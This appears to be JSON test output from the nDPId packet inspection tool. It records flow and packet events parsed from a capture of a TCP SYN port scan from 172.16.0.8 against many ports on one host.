+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsV1gAACgGyRqsEAAIQA2GNIzTAZfdU4MZAAAAAGACBAAy9QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsso4AADcGXuSsEAAIQA2GNIzTAJLdU4MZAAAAAGACEAAn+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsJu4AACgG+YSsEAAIQA2GNIzTH1\/dU4MZAAAAAGACBAAVLQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsyyYAADkGREysEAAIQA2GNIzTAtDdU4MZAAAAAGACCAAtvAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAssr4AADYGX7SsEAAIQA2GNIzTF9TdU4MZAAAAAGACDAAUuAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsicIAADMGi7CsEAAIQA2GNIzSFrfdUoMYAAAAAGACEAAR2AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060695,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_packet_id":1,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060695,"pkt":"ACYLMQczACWzv5HuCABFAAAsP70AADsGzbWsEAAIQA2GNIzSITTdUoMYAAAAAGACEAAHWwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060695,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_packet_id":1,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060695,"pkt":"ACYLMQczACWzv5HuCABFAAAsHbsAACcGA7isEAAIQA2GNIzSBALdUoMYAAAAAGACEAAkjQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/twAADMGFpasEAAIQA2GNIzSPozdUoMYAAAAAGACEADqAgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAsECUAACsGDU6sEAAIQA2GNIzSnQHdUoMYAAAAAGACEACLjQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAsdZEAADYGnOGsEAAIQA2GNIzSB5vdUoMYAAAAAGACDAAk9AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAs38EAADAGOLGsEAAIQA2GNIzSFiLdUoMYAAAAAGACBAAebQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAssGMAACsGbQ+sEAAIQA2GNIzSFGrdUoMYAAAAAGACEAAUJQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsUY0AADUGweWsEAAIQA2GNIzSI1DdUoMYAAAAAGACCAANPwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1488,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1478,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAscmYAADgGngysEAAIQA2GNIzSH0vdUoMYAAAAAGACBAAVRAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1489,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs2lMAADQGOh+sEAAIQA2GNIzSAaHdUoMYAAAAAGACBAAy7gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1490,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsxpQAAC8GUt6sEAAIQA2GNIzSgAPdUoMYAAAAAGACEACoiwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsEeAAACgGDpOsEAAIQA2GNIzSF3HdUoMYAAAAAGACBAAdHgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1482,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsuFoAAC8GYRisEAAIQA2GNIzSBd\/dUoMYAAAAAGACEAAisAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/1UAACcGIh2sEAAIQA2GNIzSBDTdUoMYAAAAAGACEAAkWwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1484,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsi7oAADYGhrisEAAIQA2GNIzSD6LdUoMYAAAAAGACDAAc7QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1495,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAswXcAACgGXvusEAAIQA2GNIzSADHdUoMYAAAAAGACBAA0XgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1496,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsersAAC4Gn7esEAAIQA2GNIzSCD\/dUoMYAAAAAGACDAAkUAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1487,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs4xUAADoGK12sEAAIQA2GNIzSAQjdUoMYAAAAAGACDAArhwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1498,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1488,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAs0AcAADMGRWusEAAIQA2GNIzSBdzdUoMYAAAAAGACEAAiswAAAgQFtA=="} 